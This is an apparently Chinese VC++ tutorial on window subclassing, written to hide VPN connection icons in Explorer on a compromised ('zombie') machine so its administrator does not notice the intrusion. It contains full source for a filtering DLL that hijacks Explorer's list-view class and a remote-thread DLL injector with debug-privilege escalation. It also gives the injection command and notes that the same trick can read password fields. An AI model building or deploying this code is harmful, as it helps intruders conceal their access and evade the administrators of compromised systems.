程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> C語言 >> VC >> 關於VC++ >> 利用窗口子類化隱藏系統圖標

利用窗口子類化隱藏系統圖標

編輯:關於VC++

窗口子類化是一種非常有用的技術,通常它用在Windows GUI編程方面,我們用這種技術來創建新的控件,比如讓SubClassing一個Edit控件添加一些消息處理讓它變成MaskEdit控件等等.反過來想想如果我們SubClassing一個有ES_PASSWORD風格的窗口控件,得到它的密碼是難是嗎?很簡單,不過是一句CallWindowProc調用,只不過在NT等系統上需要Inject一個DLL到目標進程來SubClassing一個進程中的窗口或是子窗口.

用Spy++看了一下,資源管理器裡列表視圖其實就是一個SysListView32控件,我們現在就是要"創建一個新的SysListView32控件",讓它不顯示帶有"VPN"字符串的圖標.有時我們控制了一台肉機,用VPN撥進去,但又不想管理員發現它,肯定要隱藏很多東西,隱藏圖標是最直觀的一種.

先來看看三個API:

SetWindowLong

SetClassLong

CallWindowProc

SetWindowLong可以改變一個窗口實例的窗口過程,它的作用范圍僅僅是一個窗口.

SetClassLong雖然操作的是一個窗口句柄,但作用卻是對創建這個窗口的窗口類進行修改,我們可以讓它修改進程范圍內某種窗口類的窗口過程,這裡指的窗口類是User32窗口對象類,而不是MFC或是VCL窗口封裝類.

順便提一下改變一個進程中的基本控件類也可以影響到它的超類,比如Delphi VCL使用超類化來創建控件,首先它會調用GetClassInfo得到某個類的系統窗口過程或風格等參數,比如SysListView32窗口類,然後用得到參數再注冊(RegistetClass)一個TListView窗口類,能夠在它GetClassInfo前先用SetClassLong子類化了某個窗口類,就可以實現其超類(如,TListView)的消息過濾.

而CallWindowProc通常在我們處理完消息後再調用以實現控件基本的功能,因為我們可沒有時間寫一個完整的EDIT控件或是SysListView32控件.

廢話不多說.

一個實例Explorer.dll,它在Explorer.exe進程子類化"SysListView32"窗口類,然後過濾掉帶有"VPN"字符串(不區分大小寫)的圖標,我使用了一個Magic Number,就是當圖標少於32個時才進行搜索過濾,也就是說我假定系統中的網絡連接不超過32個,這樣做是為了提高程序性能,我們不去搜索很大的文件夾.程序由VC++ 6.0 sp5編譯通過,Windows 2000 Professional下運行調試通過.使用方式是用遠程線程注入到explorer.exe進程即可,而後在explorer.exe新打開/創建的窗口中生效.

過濾程序(explorer.cpp)

#include "stdafx.h"
#include <windows.h>
#include <CommCtrl.h>
#include <process.h>
#include <tchar.h>
#include <shlwapi.h>
#define MAGIC_NUMBER  (0x20)
WNDPROC lpfnSupperClassProc=NULL;
__forceinline
void HideItem(HWND hListCtrl,DWORD dwItemcount)
{
  LVITEM li={0};
  char text[50]={0};
  li.pszText=text;
  li.cchTextMax=50;

  for(DWORD i=0;i<dwItemcount;i++)
  {
    CallWindowProc(lpfnSupperClassProc,hListCtrl,LVM_GETITEMTEXT,i,(LPARAM)&li);

    if(StrStrI(li.pszText,_T("vpn"))!=NULL)
      CallWindowProc(lpfnSupperClassProc,hListCtrl,LVM_DELETEITEM,i,0);
  }
}
LRESULT CALLBACK ListFilterProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
  DWORD dwItemcount=0;
  if(WM_PAINT==uMsg)
  {
    dwItemcount=CallWindowProc(lpfnSupperClassProc,hwnd,LVM_GETITEMCOUNT,0,0);
    if(dwItemcount<MAGIC_NUMBER)
      HideItem(hwnd,dwItemcount);
  }

  return CallWindowProc(lpfnSupperClassProc,hwnd,uMsg,wParam,lParam);
}
__forceinline
BOOL InstallListFilter()
{
  BOOL bRet=FALSE;
  HWND hWnd=NULL;

  INITCOMMONCONTROLSEX cls={sizeof(INITCOMMONCONTROLSEX),ICC_WIN95_CLASSES};
  bRet=InitCommonControlsEx(&cls);
  if(bRet)
  {
    hWnd=CreateWindow(_T("SysListView32"),_T(""),WS_CAPTION|LVS_REPORT,0,0,0,0,
        NULL,NULL,NULL,NULL);
    lpfnSupperClassProc=(WNDPROC)GetClassLong(hWnd,GCL_WNDPROC);
    SetClassLong(hWnd,GCL_WNDPROC,(LONG)ListFilterProc);

    DestroyWindow(hWnd);
  }

  return bRet;
}
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call, LPVOID lpReserved)
{
  if(DLL_PROCESS_ATTACH==ul_reason_for_call)
    InstallListFilter();
  return TRUE;
}

注入程序:InjectDLL.cpp

#include <Windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <conio.h>
BOOL EnablePrivilege(char *PrviName)
{
  HANDLE hToken;
  TOKEN_PRIVILEGES Newtp;
  BOOL bRet=FALSE;
  OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
  if(LookupPrivilegeValue(NULL,PrviName,&Newtp.Privileges[0].Luid))
  {
    Newtp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    Newtp.PrivilegeCount=1;
    if(AdjustTokenPrivileges(hToken,FALSE,&Newtp,sizeof(Newtp),NULL,NULL))
      bRet=TRUE;
  }

  CloseHandle(hToken);
  return bRet;
}
DWORD Process2PID(LPCTSTR lpszProcess)
{
  HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  PROCESSENTRY32 pe;
  DWORD dwRet=0;
  pe.dwSize=sizeof(PROCESSENTRY32);
  if(hSnap)
  {
    Process32First(hSnap,&pe);
    do {
      if(!lstrcmpi(lpszProcess,pe.szExeFile))
      {
        dwRet=pe.th32ProcessID;
        break;
      }
    } while(Process32Next(hSnap,&pe));
    CloseHandle(hSnap);
  }
  return dwRet;
}
BOOL InjectDLL(DWORD dwPid,LPCTSTR lpszDll)
{
  if(!EnablePrivilege(SE_DEBUG_NAME))
    return FALSE;
  BOOL bRet=FALSE;
  HANDLE hProcess=
    OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);
  LPVOID pAddr=VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE);
  WriteProcessMemory(hProcess,pAddr,lpszDll,lstrlen(lpszDll)+1,NULL);
  LPTHREAD_START_ROUTINE pfnLoadLibrary=
    (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
  bRet=(BOOL)CreateRemoteThread(hProcess,NULL,1024,pfnLoadLibrary,pAddr,0,NULL);
  CloseHandle(hProcess);
  return bRet;
}
int main(int argc,char **argv)
{
  printf("Inject DLL to explorer.exe %s\n",
    InjectDLL(Process2PID(argv[1]),argv[2])?"successful":"failed");
  getch();
  return 0;
}

將兩個分別編譯好後用下面的命令行:

injectDLL explorer.exe d:\wjj\explorer\debug\explorer.dll

d:\wjj\explorer\debug\explorer.dll一定要用絕對路徑,那是我用的工作目錄,你可以把explorer.dll放在其它任意地方

我更喜歡用中規中矩的"窗口子類化"來稱乎這種技術,當然也可以叫它"窗口劫持",來北京沒有多長時間,發現這裡的人都喜歡用很多很大氣的詞,平台,架構,理念......,聽起來的確有點煩.

本文配套源碼

  1. 上一頁:
  2. 下一頁:
欄目導航
Copyright © 程式師世界 All Rights Reserved